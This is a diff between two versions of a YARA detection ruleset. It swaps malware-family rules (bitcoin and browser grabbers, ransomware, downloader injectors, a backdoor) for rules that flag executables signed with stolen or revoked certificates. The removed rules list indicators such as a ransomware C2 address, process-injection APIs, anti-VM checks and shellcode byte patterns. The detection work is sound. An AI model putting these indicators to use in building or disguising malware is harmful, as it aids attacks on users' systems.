-		$ua1 = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" fullword ascii
-		$ua2 = "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36" fullword ascii
+		thumbprint = "2d072e0e80885a82d5e35806b052ca416994e0fe06da1cfdcebd509d967a1aae"
+		reason = "ParallaxRAT"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( all of ( $s* ) and 1 of ( $pdb* ) and 1 of ( $ua* ) ) or ( all of ( $ua* ) and 1 of ( $pdb* ) and 2 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Toliz Info Tech Solutions INC." and pe.signatures [ i ] . serial == "05:d5:0a:0e:09:bb:9a:83:6f:fb:90:a3" )
 }
-rule DITEKSHEN_MALWARE_Win_Bitcoingrabber : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_623Eae6A66D3A6Ee80Df9Ccebe51181E : FILE
 {
 	meta:
-		description = "Detects generic bitcoin stealer"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "f73b58da-1db5-5767-ae0a-074648e30966"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5859-L5875"
+		id = "7c3b85e4-8ce7-5c48-8f3b-e237a5cae9a0"
+		date = "2020-11-19"
+		modified = "2024-10-04"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8536-L8549"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "2dc762525c1fbf25517df52f0561d96d7469bf1367eada31c236fc313001c6cb"
+		logic_hash = "79fceab5a19025d25abb12a8e6f57f8a930d348d538d9c556b6d4fc461af66f2"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" wide
-		$s2 = "Bitcoin-Grabber" ascii
-		$s3 = "Bitcoin_Grabber" ascii
-		$s4 = "encrypt resources [compress]T" fullword ascii
-		$s5 = "code control flow obfuscationT" fullword ascii
-		$s6 = "\\Users\\lakol\\Desktop\\a\\Crypto Currency Wallet Changer\\" ascii
-		$pat1 = "\\b(bc1|[13])[a-zA-HJ-NP-Z0-9]{26,35}\\b" fullword wide
-		$pat2 = "\\b0x[a-fA-F0-9]{40}\\b" fullword wide
-		$pat3 = "\\b4([0-9]|[A-B])(.){93}\\b" fullword wide
+		thumbprint = "21c4e9af43068d041e6aec84341ae89cabb9917792c4bc372eced059555bb845"
+		reason = "Quakbot"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 4 of ( $s* ) or ( all of ( $pat* ) and 2 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "GAIN AI LTD" and pe.signatures [ i ] . serial == "62:3e:ae:6a:66:d3:a6:ee:80:df:9c:ce:be:51:18:1e" )
 }
-rule DITEKSHEN_MALWARE_Win_FOXGRABBER : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_0A392F03Ded5D73Cdeeda75052A57176 : FILE
 {
 	meta:
-		description = "Detects FOXGRABBER utility"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "b98e501c-e9c6-5fcc-bfa0-9475ce32864c"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5877-L5890"
+		id = "c0a8cc1c-7427-589b-9e32-8679e9cdf251"
+		date = "2020-11-19"
+		modified = "2024-10-04"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8551-L8564"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "5ecba516f1155bdcccf83b0a034b11d8eac8619d4c3326fdbc76082fbe4daf02"
+		logic_hash = "ea0159ec1c4670c1e961a87131998fa796cf205eaa8a06bf829c61c9694fa5ef"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "start grabbing" wide
-		$s2 = "end grabbing in" wide
-		$s3 = "error of copying files from comp:" wide
-		$s4 = "\\Firefox\\" wide nocase
-		$pdb1 = "\\obj\\Debug\\grabff.pdb" ascii
-		$pdb2 = "\\obj\\Release\\grabff.pdb" ascii
+		thumbprint = "cf1d95b39cc695e90dc2ca8b1b50f33b71f9f21091df2b72ed97f0759b5ddde4"
+		reason = "Quakbot"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or ( 1 of ( $pdb* ) and 1 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FLOWER COMPUTERS LTD" and pe.signatures [ i ] . serial == "0a:39:2f:03:de:d5:d7:3c:de:ed:a7:50:52:a5:71:76" )
 }
-rule DITEKSHEN_MALWARE_Win_Browsergrabber : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_E9268Ed63A7D7E9Dfd40A664Ddfbaf18 : FILE
 {
 	meta:
-		description = "Hunt for FOXGRABBER-like samples but for various browsers"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "a50a60cf-5ab8-5e4e-be00-aa0306f4d84f"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5892-L5906"
+		id = "59e63c76-1051-5274-b886-fcd75c8b0b38"
+		date = "2020-11-19"
+		modified = "2024-10-04"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8566-L8579"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c96a63566280758d8c32542bfab3c6faa7d21329430345f51ea4c2f0a6809dc2"
+		logic_hash = "62b9ea3c5197635db2101972af951f4afbd9b311b3c8286525bbd5b5baa17c41"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "start grabbing" wide
-		$s2 = "end grabbing in" wide
-		$s3 = "error of copying files from comp:" wide
-		$s4 = /(Chrome|Edge)/ wide
-		$ff = "\\Firefox\\" wide nocase
-		$pdb1 = "\\obj\\Debug\\grab" ascii
-		$pdb2 = "\\obj\\Release\\grab" ascii
+		thumbprint = "0767b9ab857b8e24282b80a7368323689a842e6c8b5a00a4f965c03e375e8b0d"
+		reason = "Hive"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and not ( $ff ) and ( all of ( $s* ) or ( 1 of ( $pdb* ) and 1 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Casta, s.r.o." and pe.signatures [ i ] . serial == "e9:26:8e:d6:3a:7d:7e:9d:fd:40:a6:64:dd:fb:af:18" )
 }
-rule DITEKSHEN_MALWARE_Win_Deathransom : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_Da156922F4760E0C5F5Bcf79812A27E1 : FILE
 {
 	meta:
-		description = "Detects known DeathRansom ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "a6eeb607-8b5c-5982-8b5a-aa2b3c6a65e6"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5908-L5925"
+		id = "065bacbc-3004-53c1-ba73-4779743e8221"
+		date = "2020-11-19"
+		modified = "2024-10-04"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8581-L8594"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "3c87364a7ecc403262056eeccaa16bf230fbbe684e21d35099d0d572abba9eda"
+		logic_hash = "f6dd0f2373e412a753cbe5e27152f48d6c8980de9b26e5ab212b926e7e41c813"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "%s %f %c" fullword ascii
-		$pdb1 = ":\\wud.pdb" ascii
-		$spdb2 = "\\crypt_server\\runtime\\crypt" ascii
-		$spdb3 = "\\bin\\nuvin.pdb" ascii
-		$h1 = "#Dunubeyokunov" wide
-		$h2 = "^Neyot dehipijakeyelih" wide
-		$h3 = "talin%Sanovurenofibiw" wide
-		$h4 = "WriteFile" fullword ascii
-		$h5 = "ClearEventLogA" fullword ascii
-		$h6 = "Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0" ascii wide
+		thumbprint = "6e19e012f55e0bb44e9036d4445ab945942965dcb81b9ed24ad6fc17933c4fce"
+		reason = "Quakbot"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $pdb* ) or ( all of ( $s* ) and 1 of ( $pdb* ) ) or 5 of ( $h* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DRINK AND BUBBLE LTD" and pe.signatures [ i ] . serial == "da:15:69:22:f4:76:0e:0c:5f:5b:cf:79:81:2a:27:e1" )
 }
-rule DITEKSHEN_MALWARE_Win_Unlockyourfiles : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_5226A724Cfa0B4Bc0164Ecda3F02A3Dc : FILE
 {
 	meta:
-		description = "Detects UnlockYourFiles ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "265f2a48-143a-56c9-9cd4-b5137799a9e8"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5927-L5946"
+		id = "37d1061f-80b1-5944-bde3-6279633e321a"
+		date = "2020-11-19"
+		modified = "2024-10-04"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8596-L8609"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "05f549467fac03d4aa2248a9c6c87e4c4273ed6ad727ebb77a4dd115032e454b"
+		logic_hash = "8fa1dad2cd4c1406c1346bbe0fef88eba415437d159cf9010dcfaaa7210aef0e"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "filesx0" wide
-		$s2 = "_auto_file" wide
-		$s3 = "<EncyptedKey>" fullword wide
-		$s4 = "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\" wide
-		$s5 = "DecryptAllFile" fullword ascii
-		$s6 = "AES_Only_Decrypt_File" fullword ascii
-		$m1 = "Free files decrypted" wide
-		$m2 = "Restore my files" wide
-		$m3 = "Type tour password..." wide
-		$m4 = "files encrypted by strong password" ascii
-		$m5 = "buy bitcoin" ascii
-		$m6 = "Unlock File" fullword wide
+		thumbprint = "92f005b9c46c7993205d9451823cf0410d1afbd7056a7dcdfa2b8b3da74ee1bf"
+		reason = "Quakbot"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 4 of ( $s* ) or 5 of ( $m* ) or ( 2 of ( $s* ) and 2 of ( $m* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VALENTE SP Z O O" and pe.signatures [ i ] . serial == "52:26:a7:24:cf:a0:b4:bc:01:64:ec:da:3f:02:a3:dc" )
 }
-rule DITEKSHEN_MALWARE_Win_Decryptmyfiles : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_121070Be1E782F206985543Bc7Bc58B6 : FILE
 {
 	meta:
-		description = "Detects DecryptMyFiles ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "dab518f2-3fac-5492-88fb-35cd0000ec47"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5948-L5964"
+		id = "8432c7f0-ee2e-5935-8fe8-36b0094a5e1a"
+		date = "2020-11-19"
+		modified = "2024-10-04"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8611-L8624"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "5b7f74569700e2ad3f31388571dad5ffda45f5ab3dd36806f7514aff0367d5ba"
+		logic_hash = "21eb6fed2225d2ab056948603b0990c2eb7dc9289da9a9df16f0d6cd042b3778"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "FILES ENCRYPTED" wide
-		$s2 = "pexplorer.exe" fullword wide
-		$s3 = "uniquesession" fullword ascii
-		$s4 = ".[decryptmyfiles.top]." fullword ascii
-		$s5 = "decrypt 1 file" ascii
-		$s6 = "(databases,backups, large excel" ascii
-		$c1 = "api/connect.php" ascii
-		$c2 = "decryptmyfiles.top" ascii
-		$c3 = "/contact/" ascii
+		thumbprint = "a4534aff03258589a2622398d1904d3bfd264c37e8649a68136f8d552f8b738f"
+		reason = "Quakbot"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 4 of ( $s* ) or all of ( $c* ) or ( 2 of ( $c* ) and 2 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Prod Can Holdings Inc." and pe.signatures [ i ] . serial == "12:10:70:be:1e:78:2f:20:69:85:54:3b:c7:bc:58:b6" )
 }
-rule DITEKSHEN_MALWARE_Win_Motocos : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_15C21Dab7F4E644E4B35C4858004D8A9 : FILE
 {
 	meta:
-		description = "Detects Motocos ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "be7284be-b57d-5a2c-9a84-37d76445cd0d"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5966-L5981"
+		id = "7dac5657-038f-5cbd-a854-cdb12921121e"
+		date = "2020-11-19"
+		modified = "2024-10-04"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8626-L8639"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "99ac365c277058503874313e3a74ab016d6d279b47c754c3df950e3ce60e29f1"
+		logic_hash = "646a858b10de89da4e639d3902ada78fad3a45868f0d7782546a865396cf226c"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "Block Investigation Tools" wide
-		$s2 = "powershell.exe,taskmgr.exe,procexp.exe,procmon.exe" wide
-		$s3 = "google.com,youtube.com,baidu.com,facebook.com,amazon.com,360.cn,yahoo.com,wikipedia.org,zoom.us,live.com,reddit.com,netflix.com,microsoft.com,instagram.com,vk.com," wide
-		$s4 = "START ----" wide
-		$s5 = "TEngine.Clear_EventLog_Result" wide
-		$s6 = "TEngine.EncryptLockFiles" wide
-		$s7 = "TEngine.CleanShadowFiles" wide
-		$s8 = "TDNSUtils.SendCommand" wide
+		thumbprint = "34a9cd401a5a86c5194954df3a497094c01b6603264aab5cf7d9b3c4a0074801"
+		reason = "Quakbot"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 4 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "P.REGO, s.r.o." and pe.signatures [ i ] . serial == "15:c2:1d:ab:7f:4e:64:4e:4b:35:c4:85:80:04:d8:a9" )
 }
-rule DITEKSHEN_MALWARE_Win_Dlagent12 : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_101D6A5A29D9A77807553Ceac669D853 : FILE
 {
 	meta:
-		description = "Detects downloader agent"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "841b998b-99d1-50d8-bc7b-75b2a8e690bf"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5983-L5993"
+		id = "8554ce79-fd87-54ac-b538-e2899fe95414"
+		date = "2020-11-19"
+		modified = "2024-10-04"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8641-L8654"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b9845414f4ce4cc25b75a8de7569c4135bbb7ba9098fd4c50d7ac80302e99b8f"
+		logic_hash = "be6b5a98d5c218c39d8f10bc2a0e443bc8be8a591ab368ee902de4a45a95c8d2"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "WebClient" fullword ascii
-		$s2 = "DownloadData" fullword ascii
-		$s3 = "packet_server" fullword wide
+		thumbprint = "cd6aa9a7a4898e42b8361dc3542d0afb72e6deefc0b85ebfb55d282a2982b994"
+		reason = "IcedID"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them and filesize < 50KB
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BIC GROUP LIMITED" and pe.signatures [ i ] . serial == "10:1d:6a:5a:29:d9:a7:78:07:55:3c:ea:c6:69:d8:53" )
 }
-rule DITEKSHEN_MALWARE_Win_Dlinjector01 : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_4679C5398A279318365Fd77A84445699 : FILE
 {
 	meta:
-		description = "Detects specific downloader injector shellcode"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "c5e0946c-3e15-5ebc-b1b5-3f00566dc5cd"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5995-L6015"
+		id = "ff4061e7-5e45-596f-9d40-c33661a18e71"
+		date = "2020-11-19"
+		modified = "2024-10-04"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8656-L8669"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "5c13af5fdbb2e8a27103d9502126a82d0bff15d9a269b22e4279b5b459d50e2d"
+		logic_hash = "1c591cbb2d35d8dad01ff4ea8c71c8b3a0a5f999f1edfcfc038e47f96d3a3a67"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "process call create \"%s\"" ascii wide
-		$s2 = "\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\" ascii wide
-		$s3 = "%systemroot%\\system32\\ntdll.dll" ascii wide
-		$s4 = "qemu-ga.exe" ascii wide
-		$s5 = "prl_tools.exe" ascii wide
-		$s6 = "vboxservice.exe" ascii wide
-		$o1 = { 75 04 74 02 38 6e 8b 34 24 83 c4 04 eb 0a 08 81 }
-		$o2 = { 16 f8 f7 ba f0 3d 87 c7 95 13 b7 64 22 be e1 59 }
-		$o3 = { 8b 0c 24 83 c4 04 eb 05 ea f2 eb ef 05 e8 ad fe }
-		$o4 = { eb 05 1d 51 eb f5 ce e8 80 fd ff ff 77 a1 f4 cd }
-		$o5 = { eb 05 6e 33 eb f5 73 e8 64 f6 ff ff 77 a1 f4 77 }
-		$o6 = { 59 eb 05 fd 98 eb f4 50 e8 d5 f5 ff ff 3b b9 00 }
-		$o7 = "bYkoDA7G" fullword ascii
+		thumbprint = "8fcef52c16987307f4e1f7d4b62304c65aedb952c90bb2ead8321f1e1d7c9a6e"
+		reason = "Quakbot"
+		importance = 20
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and all of ( $o* ) ) or ( all of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "HURT GROUP HOLDINGS LIMITED" and pe.signatures [ i ] . serial == "46:79:c5:39:8a:27:93:18:36:5f:d7:7a:84:44:56:99" )
 }
-rule DITEKSHEN_MALWARE_Win_Dlinjector02 : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_282A8A04073Eced658B9770Bda8C0D28 : FILE
 {
 	meta:
-		description = "Detects downloader injector"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "ce2c418d-18e4-579c-9828-94e294385846"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6017-L6034"
+		id = "d735ccfc-3f5e-5858-95ec-f385172ea8e6"
+		date = "2020-11-19"
+		modified = "2024-10-04"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8671-L8684"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "76d185cfcbc7f4996c2fb5c7c1ba4eb20b32d322d8ff47594283a4ca3e573a0b"
+		logic_hash = "4cfebe55887a2a09293678e4dff2f93f22bec151dada7c84a41ac6deb10b7cc3"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "In$J$ct0r" fullword wide
-		$x2 = "%InJ%ector%" fullword wide
-		$a1 = "WriteProcessMemory" fullword wide
-		$a2 = "URLDownloadToFileA" fullword ascii
-		$a3 = "Wow64SetThreadContext" fullword wide
-		$a4 = "VirtualAllocEx" fullword wide
-		$s1 = "RunPE" fullword wide
-		$s2 = "SETTINGS" fullword wide
-		$s3 = "net.pipe" fullword wide
-		$s4 = "vsmacros" fullword wide
+		thumbprint = "5cd4832101eb4f173c43986d5711087c8de25e6fcaef2f333e98a013e29b8373"
+		reason = "RedLineStealer"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 1 of ( $x* ) or ( all of ( $a* ) and 3 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Betamaynd" and pe.signatures [ i ] . serial == "28:2a:8a:04:07:3e:ce:d6:58:b9:77:0b:da:8c:0d:28" )
 }
-rule DITEKSHEN_MALWARE_Win_Nermer : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_0C48732873Ac8Ccebaf8F0E1E8329Cec : FILE
 {
 	meta:
-		description = "Detects Nermer ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "fce4f178-8e98-53b0-ae09-2ce876ad524e"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6036-L6062"
+		id = "dacde33d-3925-52c6-87fd-9f3ead6bfab0"
+		date = "2020-11-19"
+		modified = "2024-10-04"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8686-L8699"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e885b1b908b256ee07f5cb144d63f5ad65e5bf746b70efe168b0ac742a246ab3"
+		logic_hash = "64c61d1bb48d790a2a3da85c6e57b542f0ee8a85296fc3e8c17ea18d8241790d"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "gPROTECT_INFO.TXT" fullword wide
-		$x2 = ".nermer" fullword wide
-		$s1 = "db_journal" fullword wide
-		$s2 = "quicken2015backup" fullword wide
-		$s3 = "mysql" fullword wide
-		$s4 = "sas7bdat" fullword wide
-		$s5 = "httpd.exe" fullword wide
-		$s6 = "Intuit.QuickBooks.FCS" fullword wide
-		$s7 = "convimage" fullword wide
-		$s8 = ".?AV?$_Binder@U_Unforced@std@@P8shares_t@" ascii
-		$s9 = "BgIAAACkAABSU0ExAAgAAAEAAQCt" ascii
-		$m1 = "YOUR FILES WERE ENCRYPTED" ascii
-		$m2 = "MARKED BY EXTENSION .nermer" ascii
-		$m3 = "send us your id: >> {id} <<" ascii
-		$m4 = "email us: >> {email} <<" ascii
-		$c1 = "/repeater.php" ascii
-		$c2 = "HTTPClient/0.1" fullword ascii
-		$c3 = "94.156.35.227" ascii
-		$c4 = "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" fullword ascii
+		thumbprint = "14ffc96c8cc2ea2d732ed75c3093d20187a4c72d02654ff4520448ba7f8c7df6"
+		reason = "HermeticWiper"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $m* ) or all of ( $c* ) or all of ( $s* ) or ( 4 of ( $s* ) and ( 1 of ( $x* ) or 1 of ( $m* ) or 2 of ( $c* ) ) ) or 14 of them )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Hermetica Digital Ltd" and pe.signatures [ i ] . serial == "0c:48:73:28:73:ac:8c:ce:ba:f8:f0:e1:e8:32:9c:ec" )
 }
-rule DITEKSHEN_MALWARE_Win_Beastdoor : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_Da20761Afbb0463C55B1Ea88Bbc7Ec57 : FILE
 {
 	meta:
-		description = "Detects Beastdoor backdoor"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "b271d53e-2693-5a93-825a-ef32f72a4b01"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6064-L6084"
+		id = "63e4b8f6-64f1-58a2-920a-e1d4b113380b"
+		date = "2020-11-19"
+		modified = "2024-10-04"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8716-L8729"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d9a72717d124bcf1e3b95850cd524e577abe96a094586a5555faadba78fcb9ad"
+		logic_hash = "a4f6bb9742ab40e8003ea14f9645f0c7f885b461fbeb01164b86ddacbda1113f"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "shellx.pif" fullword ascii nocase
-		$s2 = "Beasty" fullword ascii
-		$s3 = "* Boot:[" ascii
-		$s4 = "^ Shut Down:[" ascii
-		$s5 = "set cdaudio door" ascii
-		$s6 = "This \"Portable Network Graphics\" image is not valid" wide
-		$n1 = ".aol.com" ascii
-		$n2 = "web.icq.com" ascii
-		$n3 = "&fromemail=" fullword ascii
